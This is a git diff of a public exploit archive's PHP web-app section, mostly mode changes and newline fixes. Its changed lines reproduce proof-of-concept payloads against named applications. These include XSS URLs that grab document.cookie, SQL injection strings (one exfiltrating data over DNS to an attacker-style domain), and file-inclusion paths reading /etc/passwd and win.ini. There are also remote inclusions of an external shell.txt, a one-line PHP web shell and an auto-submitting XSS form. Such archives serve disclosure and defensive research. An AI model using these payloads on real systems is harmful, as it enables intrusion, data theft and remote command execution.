b/platforms/php/webapps/3751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37511.txt b/platforms/php/webapps/37511.txt old mode 100755 new mode 100644 index 5be4937bd..a86044e21 --- a/platforms/php/webapps/37511.txt +++ b/platforms/php/webapps/37511.txt @@ -8,4 +8,4 @@ AVA VoIP 1.5.12 is vulnerable; other versions may also be affected. http://www.example.com/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C http://www.example.com/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C -http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file +http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file diff --git a/platforms/php/webapps/37514.txt b/platforms/php/webapps/37514.txt old mode 100755 new mode 100644 index b501bfc20..3c4a5e5e9 --- a/platforms/php/webapps/37514.txt +++ b/platforms/php/webapps/37514.txt @@ -16,4 +16,4 @@ Example: site/wp-content/uploads/uigen_2015/evil.php evil.php: <?php passthru($_GET['cmd']); ?> -TUNISIAN CYBER(miutex)-S4E \ No newline at end of file +TUNISIAN CYBER(miutex)-S4E \ No newline at end of file diff --git a/platforms/php/webapps/37515.txt b/platforms/php/webapps/37515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37519.txt b/platforms/php/webapps/37519.txt old mode 100755 new mode 100644 index d49944efb..769060b53 --- a/platforms/php/webapps/37519.txt +++ b/platforms/php/webapps/37519.txt @@ -4,4 +4,4 @@ The 'com_hello' component for Joomla! is prone to a local file-include vulnerabi An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/3752.txt b/platforms/php/webapps/3752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37520.txt b/platforms/php/webapps/37520.txt old mode 100755 new mode 100644 index fb58c94e4..4d5e0a2c4 --- a/platforms/php/webapps/37520.txt +++ b/platforms/php/webapps/37520.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to execute arbitrary local files w Maian Survey 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/[PATH]/admin/index.php?cmd=LFÃ?°_here \ No newline at end of file +http://www.example.com/[PATH]/admin/index.php?cmd=LFÃ?°_here \ No newline at end of file diff --git a/platforms/php/webapps/37521.txt b/platforms/php/webapps/37521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37522.txt b/platforms/php/webapps/37522.txt old mode 100755 new mode 100644 index 33f616e84..3307c5751 --- a/platforms/php/webapps/37522.txt +++ b/platforms/php/webapps/37522.txt @@ -4,4 +4,4 @@ The chenpress plugin for WordPress is prone to a vulnerability that lets attacke An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. - http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html \ No newline at end of file + http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html \ No newline at end of file diff --git a/platforms/php/webapps/37528.txt b/platforms/php/webapps/37528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3753.txt b/platforms/php/webapps/3753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37530.txt b/platforms/php/webapps/37530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37534.txt b/platforms/php/webapps/37534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37537.txt b/platforms/php/webapps/37537.txt old mode 100755 new mode 100644 index 678745d3a..e7f532954 --- a/platforms/php/webapps/37537.txt +++ b/platforms/php/webapps/37537.txt @@ -8,4 +8,4 @@ phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected. http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS] http://www.example.com/full_release/community.php?comm_id=[SQL] -http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt? \ No newline at end of file +http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/37540.txt b/platforms/php/webapps/37540.txt old mode 100755 new mode 100644 index 7567a75df..9f7af4b10 --- a/platforms/php/webapps/37540.txt +++ b/platforms/php/webapps/37540.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Odudeprofile 2.7 and 2.8 are vulnerable; prior versions may also be affected. - http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL) \ No newline at end of file + http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL) \ No newline at end of file diff --git a/platforms/php/webapps/37541.txt b/platforms/php/webapps/37541.txt old mode 100755 new mode 100644 index 632830fcc..d2edf0a99 --- a/platforms/php/webapps/37541.txt +++ b/platforms/php/webapps/37541.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access tekno.Portal 0.1b is vulnerable; other versions may also be affected. - http://www.example.com/teknoportal/anket.php?id=[SQLi] \ No newline at end of file + http://www.example.com/teknoportal/anket.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37544.txt b/platforms/php/webapps/37544.txt old mode 100755 new mode 100644 index e9f99bc0e..9be91aebb --- a/platforms/php/webapps/37544.txt +++ b/platforms/php/webapps/37544.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. Versions prior to ocPortal 7.1.6 are vulnerable. -http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com \ No newline at end of file +http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com \ No newline at end of file diff --git a/platforms/php/webapps/37547.txt b/platforms/php/webapps/37547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37548.txt b/platforms/php/webapps/37548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37551.txt b/platforms/php/webapps/37551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37552.txt b/platforms/php/webapps/37552.txt old mode 100755 new mode 100644 index 012503b44..e7fc16259 --- a/platforms/php/webapps/37552.txt +++ b/platforms/php/webapps/37552.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation. -http://www.example.com/player.swf?playerready=alert(document.cookie) \ No newline at end of file +http://www.example.com/player.swf?playerready=alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/37553.txt b/platforms/php/webapps/37553.txt old mode 100755 new mode 100644 index a685815c6..ae1dffb81 --- a/platforms/php/webapps/37553.txt +++ b/platforms/php/webapps/37553.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access eNdonesia 8.5 is vulnerable; other versions may also be affected. -http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION] \ No newline at end of file +http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/37554.txt b/platforms/php/webapps/37554.txt old mode 100755 new mode 100644 index d89db205d..7209ee1dd --- a/platforms/php/webapps/37554.txt +++ b/platforms/php/webapps/37554.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Limny 3.3.1 is vulnerable; other versions may also be affected. - http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL \ No newline at end of file + http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL \ No newline at end of file diff --git a/platforms/php/webapps/37556.txt b/platforms/php/webapps/37556.txt old mode 100755 new mode 100644 index ff8bfd3cd..2d6cc6603 --- a/platforms/php/webapps/37556.txt +++ b/platforms/php/webapps/37556.txt @@ -10,4 +10,4 @@ https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3C https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1 https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E -https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30 \ No newline at end of file +https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30 \ No newline at end of file diff --git a/platforms/php/webapps/37559.txt b/platforms/php/webapps/37559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3756.txt b/platforms/php/webapps/3756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37560.txt b/platforms/php/webapps/37560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37563.html b/platforms/php/webapps/37563.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37565.txt b/platforms/php/webapps/37565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37567.txt b/platforms/php/webapps/37567.txt old mode 100755 new mode 100644 index 434981a38..4a51108c5 --- a/platforms/php/webapps/37567.txt +++ b/platforms/php/webapps/37567.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access tekno.Portal 0.1b is vulnerable; other versions may also be affected. - http://www.example.com/teknoportal/link.php?kat=[Blind SQL Injection] \ No newline at end of file + http://www.example.com/teknoportal/link.php?kat=[Blind SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/37572.txt b/platforms/php/webapps/37572.txt old mode 100755 new mode 100644 index 080f6c891..ed195e8ae --- a/platforms/php/webapps/37572.txt +++ b/platforms/php/webapps/37572.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Elefant CMS 1.2.0 is vulnerable; other versions may also be affected. - http://www.example.com/admin/versions?id=[XSS]&type=Webpage \ No newline at end of file + http://www.example.com/admin/versions?id=[XSS]&type=Webpage \ No newline at end of file diff --git a/platforms/php/webapps/37575.txt b/platforms/php/webapps/37575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37578.txt b/platforms/php/webapps/37578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37579.txt b/platforms/php/webapps/37579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3758.php b/platforms/php/webapps/3758.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37580.txt b/platforms/php/webapps/37580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37581.txt b/platforms/php/webapps/37581.txt old mode 100755 new mode 100644 index 91ad04514..cac67982b --- a/platforms/php/webapps/37581.txt +++ b/platforms/php/webapps/37581.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to compromise the s Dir2web versions 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa&apos; OR id > 0-- - \ No newline at end of file +http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa&apos; OR id > 0-- - \ No newline at end of file diff --git a/platforms/php/webapps/37583.txt b/platforms/php/webapps/37583.txt old mode 100755 new mode 100644 index bbafb1849..89903becb --- a/platforms/php/webapps/37583.txt +++ b/platforms/php/webapps/37583.txt @@ -4,4 +4,4 @@ YT-Videos Script is prone to an SQL-injection vulnerability because it fails to A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/demo/ytvideos/play.php?id=2' \ No newline at end of file +http://www.example.com/demo/ytvideos/play.php?id=2' \ No newline at end of file diff --git a/platforms/php/webapps/37584.txt b/platforms/php/webapps/37584.txt old mode 100755 new mode 100644 index e134b0d81..41c43cad1 --- a/platforms/php/webapps/37584.txt +++ b/platforms/php/webapps/37584.txt @@ -7,4 +7,4 @@ A successful exploit could allow an attacker to compromise the application, acce Versions prior to TCExam 11.3.008 are vulnerable. http://www.example.com/admin/code/tce_edit_answer.php?subject_module_id -http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id \ No newline at end of file +http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id \ No newline at end of file diff --git a/platforms/php/webapps/37585.txt b/platforms/php/webapps/37585.txt old mode 100755 new mode 100644 index d45de4d80..658b32765 --- a/platforms/php/webapps/37585.txt +++ b/platforms/php/webapps/37585.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Versions prior to TCExam 11.3.008 are vulnerable. -http://www.example.com/admin/code/tce_edit_question.php?subject_module_id \ No newline at end of file +http://www.example.com/admin/code/tce_edit_question.php?subject_module_id \ No newline at end of file diff --git a/platforms/php/webapps/37586.php b/platforms/php/webapps/37586.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37587.txt b/platforms/php/webapps/37587.txt old mode 100755 new mode 100644 index 55e83fca2..8fd330f13 --- a/platforms/php/webapps/37587.txt +++ b/platforms/php/webapps/37587.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor GetSimple 3.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/cms/admin/filebrowser.php?path=[LFI] \ No newline at end of file +http://www.example.com/cms/admin/filebrowser.php?path=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/37588.txt b/platforms/php/webapps/37588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37590.txt b/platforms/php/webapps/37590.txt old mode 100755 new mode 100644 index 517253b4e..e00fc898a --- a/platforms/php/webapps/37590.txt +++ b/platforms/php/webapps/37590.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHPList 2.10.18 is vulnerable; other versions may also be affected. -http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E \ No newline at end of file +http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E \ No newline at end of file diff --git a/platforms/php/webapps/37591.php b/platforms/php/webapps/37591.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37592.php b/platforms/php/webapps/37592.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37594.txt b/platforms/php/webapps/37594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37595.txt b/platforms/php/webapps/37595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37596.txt b/platforms/php/webapps/37596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3760.txt b/platforms/php/webapps/3760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37601.txt b/platforms/php/webapps/37601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37602.txt b/platforms/php/webapps/37602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37603.txt b/platforms/php/webapps/37603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37604.txt b/platforms/php/webapps/37604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3761.txt b/platforms/php/webapps/3761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37610.txt b/platforms/php/webapps/37610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37613.txt b/platforms/php/webapps/37613.txt old mode 100755 new mode 100644 index eff999d50..565d4840d --- a/platforms/php/webapps/37613.txt +++ b/platforms/php/webapps/37613.txt @@ -10,4 +10,4 @@ http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select ver http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- -http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \ No newline at end of file +http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \ No newline at end of file diff --git a/platforms/php/webapps/37614.txt b/platforms/php/webapps/37614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37615.txt b/platforms/php/webapps/37615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37616.txt b/platforms/php/webapps/37616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37617.txt b/platforms/php/webapps/37617.txt old mode 100755 new mode 100644 index fd2a5fa79..6f54775eb --- a/platforms/php/webapps/37617.txt +++ b/platforms/php/webapps/37617.txt @@ -5,4 +5,4 @@ dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini -http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini \ No newline at end of file +http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini \ No newline at end of file diff --git a/platforms/php/webapps/3762.htm b/platforms/php/webapps/3762.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37620.txt b/platforms/php/webapps/37620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37622.txt b/platforms/php/webapps/37622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37629.txt b/platforms/php/webapps/37629.txt old mode 100755 new mode 100644 index 28cb33abe..ed4eca6b8 --- a/platforms/php/webapps/37629.txt +++ b/platforms/php/webapps/37629.txt @@ -58,5 +58,4 @@ Timeline Discovered by dxw: ================ Tom Adams -Please visit security.dxw.com for more information. - \ No newline at end of file +Please visit security.dxw.com for more information. \ No newline at end of file diff --git a/platforms/php/webapps/3763.txt b/platforms/php/webapps/3763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37630.txt b/platforms/php/webapps/37630.txt old mode 100755 new mode 100644 index c96158dd1..cab080524 --- a/platforms/php/webapps/37630.txt +++ b/platforms/php/webapps/37630.txt @@ -8,4 +8,4 @@ Hotel Booking Portal 0.1 is vulnerable; other versions may also be affected. http://www.example.com/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script> http://www.example.com/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script> -http://www.example.com/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script> \ No newline at end of file +http://www.example.com/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script> \ No newline at end of file diff --git a/platforms/php/webapps/37632.txt b/platforms/php/webapps/37632.txt old mode 100755 new mode 100644 index 73ac5f1f8..89c953f81 --- a/platforms/php/webapps/37632.txt +++ b/platforms/php/webapps/37632.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br CodeIgniter 2.1.2 is vulnerable; other versions may also be affected. -Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; \ No newline at end of file +Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; \ No newline at end of file diff --git a/platforms/php/webapps/37633.txt b/platforms/php/webapps/37633.txt old mode 100755 new mode 100644 index dba488c28..86f6890d5 --- a/platforms/php/webapps/37633.txt +++ b/platforms/php/webapps/37633.txt @@ -4,4 +4,4 @@ mIRC is prone to a cross-site scripting vulnerability because it fails to proper An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);> \ No newline at end of file +http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);> \ No newline at end of file diff --git a/platforms/php/webapps/37634.txt b/platforms/php/webapps/37634.txt old mode 100755 new mode 100644 index 333245726..a323c652b --- a/platforms/php/webapps/37634.txt +++ b/platforms/php/webapps/37634.txt @@ -11,4 +11,4 @@ http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.examp http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt? http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00 http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00 -http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00 \ No newline at end of file +http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/37635.txt b/platforms/php/webapps/37635.txt old mode 100755 new mode 100644 index c1e913250..7dd49f9c0 --- a/platforms/php/webapps/37635.txt +++ b/platforms/php/webapps/37635.txt @@ -10,4 +10,4 @@ http://www.example.com/MFH/download.php?file=../../../../../../../../../../windo For DaddyScripts Daddy's File Host: -http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg \ No newline at end of file +http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg \ No newline at end of file diff --git a/platforms/php/webapps/37636.txt b/platforms/php/webapps/37636.txt old mode 100755 new mode 100644 index a8515341c..3f63f59f0 --- a/platforms/php/webapps/37636.txt +++ b/platforms/php/webapps/37636.txt @@ -12,4 +12,4 @@ http://www.example.com/wp-admin/admin.php?page=emails&edit=%22%3E%3Ciframe+src%3 http://www.example.com/wp-admin/admin.php?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C -http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]-- \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]-- \ No newline at end of file diff --git a/platforms/php/webapps/3764.txt b/platforms/php/webapps/3764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37641.txt b/platforms/php/webapps/37641.txt old mode 100755 new mode 100644 index 969122994..1c2365b31 --- a/platforms/php/webapps/37641.txt +++ b/platforms/php/webapps/37641.txt @@ -4,4 +4,4 @@ JPM Article Blog Script 6 is prone to a cross-site scripting vulnerability becau An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/forum/index.php?tid=4â??></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee> \ No newline at end of file +http://www.example.com/forum/index.php?tid=4â??></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee> \ No newline at end of file diff --git a/platforms/php/webapps/37642.txt b/platforms/php/webapps/37642.txt old mode 100755 new mode 100644 index b4e0e0d95..651bda5a1 --- a/platforms/php/webapps/37642.txt +++ b/platforms/php/webapps/37642.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SaltOS 3.1 is vulnerable; other versions may also be affected. -http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script> \ No newline at end of file +http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script> \ No newline at end of file diff --git a/platforms/php/webapps/37643.txt b/platforms/php/webapps/37643.txt old mode 100755 new mode 100644 index 04eccb903..2d9a3b2f1 --- a/platforms/php/webapps/37643.txt +++ b/platforms/php/webapps/37643.txt @@ -26,4 +26,4 @@ https://www.example.com/HelloVXMLError.jsp https://www.example.com/HelloVXML.jsp https://www.example.com/HelloWMLError.jsp https://www.example.com/HelloWML.jsp -https://www.example.com/cqweb/j_security_check \ No newline at end of file +https://www.example.com/cqweb/j_security_check \ No newline at end of file diff --git a/platforms/php/webapps/37644.txt b/platforms/php/webapps/37644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37645.txt b/platforms/php/webapps/37645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37646.txt b/platforms/php/webapps/37646.txt old mode 100755 new mode 100644 index bbf293361..412f52cb2 --- a/platforms/php/webapps/37646.txt +++ b/platforms/php/webapps/37646.txt @@ -8,4 +8,4 @@ Banana Dance B.2.1 is vulnerable; other versions may also be affected. http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000174)%3C/script%3E&category=3 http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017B)%3C/script%3E&category=3 -http://www.example.com/search.php?q=234&category=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ \ No newline at end of file +http://www.example.com/search.php?q=234&category=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ \ No newline at end of file diff --git a/platforms/php/webapps/37648.txt b/platforms/php/webapps/37648.txt old mode 100755 new mode 100644 index 7c019f09f..ad8a7e2e0 --- a/platforms/php/webapps/37648.txt +++ b/platforms/php/webapps/37648.txt @@ -8,4 +8,4 @@ http://www.example.com/lynda/administrator/components/com_civicrm/civicrm/packag http://www.example.com/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html -http://www.example.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html \ No newline at end of file +http://www.example.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html \ No newline at end of file diff --git a/platforms/php/webapps/37649.html b/platforms/php/webapps/37649.html old mode 100755 new mode 100644 index 0fe5ab3e9..684e68e22 --- a/platforms/php/webapps/37649.html +++ b/platforms/php/webapps/37649.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SiNG cms 2.9.0 is vulnerable; other versions may also be affected. -<html> <head> <title>SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability</title> </head> <body> <form name="email" method="post" action="http://www,example.com/singcms/password.php"> <input type="hidden" name="email" value='"><script>alert("XSS");</script>' /> <input type="hidden" name="send" value="Send password" /> </form> <script type="text/javascript"> document.email.submit(); </script> </body> </html> \ No newline at end of file +<html> <head> <title>SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability</title> </head> <body> <form name="email" method="post" action="http://www,example.com/singcms/password.php"> <input type="hidden" name="email" value='"><script>alert("XSS");</script>' /> <input type="hidden" name="send" value="Send password" /> </form> <script type="text/javascript"> document.email.submit(); </script> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/3765.txt b/platforms/php/webapps/3765.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37650.txt b/platforms/php/webapps/37650.txt old mode 100755 new mode 100644 index 544ece09c..433724510 --- a/platforms/php/webapps/37650.txt +++ b/platforms/php/webapps/37650.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc 1024 CMS 2.1.1 is vulnerable; other versions may also be affected. -http:// www.example.com/index.php?p=[SQLi] \ No newline at end of file +http:// www.example.com/index.php?p=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37651.html b/platforms/php/webapps/37651.html old mode 100755 new mode 100644 index 769b2eb7b..731520a7e --- a/platforms/php/webapps/37651.html +++ b/platforms/php/webapps/37651.html @@ -55,4 +55,4 @@ document.forms["add_page"].submit(); <input type="button" value="Execute XSS 2" onClick="xss2()" /> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/37652.txt b/platforms/php/webapps/37652.txt old mode 100755 new mode 100644 index fe690bbb8..8104bbdb2 --- a/platforms/php/webapps/37652.txt +++ b/platforms/php/webapps/37652.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow KindEditor versions 4.1.2 and 4.0.6 are vulnerable; other versions may also be affected. -http://www.example.com/kindeditor/index.php?name=<pre><script>alert('XSS');</script>by ZSL!</pre> \ No newline at end of 